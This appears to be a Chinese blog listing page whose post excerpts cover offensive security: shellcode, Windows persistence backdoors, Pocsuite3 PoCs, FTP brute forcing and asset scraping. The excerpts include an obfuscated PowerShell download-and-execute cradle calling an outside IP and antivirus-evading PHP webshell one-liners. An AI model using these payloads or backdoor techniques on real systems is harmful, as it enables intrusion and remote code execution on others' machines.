上一页 1 2 3 4 5 6 ··· 10 下一页
摘要: https://blog.csdn.net/qq_32261191/article/details/108994177 分析shellcode ctypes是 Python 的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 DLL 或共享库中的函数。可使用该模块以纯 Python 形式对这些 阅读全文
posted @ 2021-08-14 12:31 bingtanghulu 阅读(197) 评论(0) 推荐(0) 编辑
摘要: 1.找到csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 2.找到System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Managemen 阅读全文
posted @ 2021-08-14 11:16 bingtanghulu 阅读(19) 评论(0) 推荐(0) 编辑
摘要: 最终结果 windows10 echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10’+'1.34.38.1'+'89/a') | %psmodul 阅读全文
posted @ 2021-08-14 10:06 bingtanghulu 阅读(39) 评论(0) 推荐(0) 编辑
摘要: 一 注册表 二 计划任务 三 服务 四 影子账户和激活guest 五 快捷键位 六 镜像劫持 七 屏幕保护程序 八 dll劫持 九 wmi后门 一、注册表 打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下新建一个开 阅读全文
posted @ 2021-08-14 00:20 bingtanghulu 阅读(272) 评论(0) 推荐(0) 编辑
摘要: github地址:https://github.com/knownsec/Pocsuite3 首先确定pocsuit的命令执行方式 verify模式为漏洞检测模式 attack模式为向目标发起有效的攻击 首先找到一个poc 进行分析源码 复制其源码,再原有的基础框架进行修改,首先修改检测模块 这里举 阅读全文
posted @ 2021-08-13 21:38 bingtanghulu 阅读(850) 评论(1) 推荐(0) 编辑
摘要: import requests,base64,time,sys,threading,queue #异或免杀 #<?php $a=("!"^"@").'ssert';$a($_POST['hacker']);?> #<?php @eval($_POST['hacker']);?> #!和@ 先各种转为 阅读全文
posted @ 2021-08-13 18:45 bingtanghulu 阅读(197) 评论(0) 推荐(0) 编辑
摘要: import sys,ftplib import threading,queue def ftp_brute(ip,port): ftp = ftplib.FTP() ftp.connect(ip,int(port)) while not q.empty():#判断q不为空 dict=q.get() 阅读全文
posted @ 2021-08-13 16:45 bingtanghulu 阅读(164) 评论(0) 推荐(0) 编辑
摘要: import socket, os, time, sys, whois # ip查询 def ip_check(url): ip = socket.gethostbyname(url) print(ip) # whois查询 def whois_check(url): data = whois.wh 阅读全文
posted @ 2021-08-13 13:43 bingtanghulu 阅读(319) 评论(0) 推荐(0) 编辑
摘要: import requests, time from lxml import etree def src_tiqu(yeshu): for i in range(1,int(yeshu)+1): try: url = 'https://src.sjtu.edu.cn/list/?i=' + str( 阅读全文
posted @ 2021-08-13 12:44 bingtanghulu 阅读(294) 评论(0) 推荐(0) 编辑
摘要: import requests,base64,time,sys from lxml import etree # fofa网址获取 # 例如:https://fofa.so/result?qbase64 &page=3 def fofa_search(search_data,page): #sear 阅读全文
posted @ 2021-08-13 10:54 bingtanghulu 阅读(292) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 ··· 10 下一页